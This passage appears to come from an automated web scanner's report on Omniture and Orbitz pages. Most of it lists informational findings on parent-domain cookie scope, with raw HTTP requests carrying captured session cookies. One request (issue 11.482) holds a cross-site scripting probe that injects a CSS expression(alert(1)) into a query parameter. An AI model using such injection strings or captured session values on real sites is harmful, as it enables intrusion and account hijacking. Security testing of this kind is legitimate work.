<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press Detail: Adobe Ac
...[SNIP]...

11.474. http://www.omniture.com/zh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/zh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:54:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zh HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:54:16 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:54:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:54:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cms_site_lang=4; expires=Sat, 05-Mar-2011 05:54:16 GMT; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:54:16 GMT; path=/; domain=omniture.com
Content-Length: 35790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//zh" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="zh" lang="zh">
<head>
<title>Omniture - Web ................
...[SNIP]...

11.475. http://www.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296342267897:ss=1296342267897

Response

11.476. http://www.orbitz.com/App/DPTLandingPageSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DPTLandingPageSearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/DPTLandingPageSearch?z=4fbc&r=22 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.477. http://www.orbitz.com/App/DisplayCarSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DisplayCarSearch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy||||||||||mm/dd/yy|||||||||||||||||||||||||||||||||||||||||||advanced_search|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/DisplayCarSearch?z=2eba&r=d HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.478. http://www.orbitz.com/App/GDDC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/GDDC?deal_id=airtran-airways-flight-deal&type=bo_qs HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.479. http://www.orbitz.com/App/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/Home?reset=true&z=2eb6&r=9 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.480. http://www.orbitz.com/App/InitDealEdit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/InitDealEdit

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/InitDealEdit?fromDealsPage=true&z=2eca&r=t HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.481. http://www.orbitz.com/App/PartnerTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PartnerTracking

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
partnerVisit=8162e4639; Domain=.orbitz.com; Path=/
partnerStamp=21611046; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/PartnerTracking?partnerUrl=TRAVELERUPDATE HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OSC=3CAFC1764B7F8E6FA6842EB8D55CDFBA; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: partnerVisit=8162e4639; Domain=.orbitz.com; Path=/
Set-Cookie: partnerStamp=21611046; Domain=.orbitz.com; Path=/
Set-Cookie: owt=0; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Location: http://updates.orbitz.com
Content-Type: text/html
Content-Length: 0
Date: Wed, 02 Feb 2011 16:06:20 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

11.482. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

anon=15636604731296573771992; Domain=.orbitz.com; Expires=Mon, 27-Jan-2031 15:22:51 GMT; Path=/
OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Mon, 27-Jan-2031 15:22:51 GMT; Path=/
logging=4D84CD377DBEA23C09465CAB80CFF42F|egapp06p|; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.orbitz.com
Cookie: BetaGroup="01/27/2011 19:52:47|A|A|N|C|N|H|B|P|N"; WT_FPC=id=173.193.214.243-504835424.30129806:lv=1296179681835:ss=1296179632090

Response

11.483. http://www.orbitz.com/App/PrepareActivitiesHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareActivitiesHome

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/PrepareActivitiesHome?z=2ebc&r=f HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.484. http://www.orbitz.com/App/PrepareDealsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareDealsHome

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/PrepareDealsHome?z=2ebd&r=g HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.485. http://www.orbitz.com/App/PrepareFlightsTab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareFlightsTab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
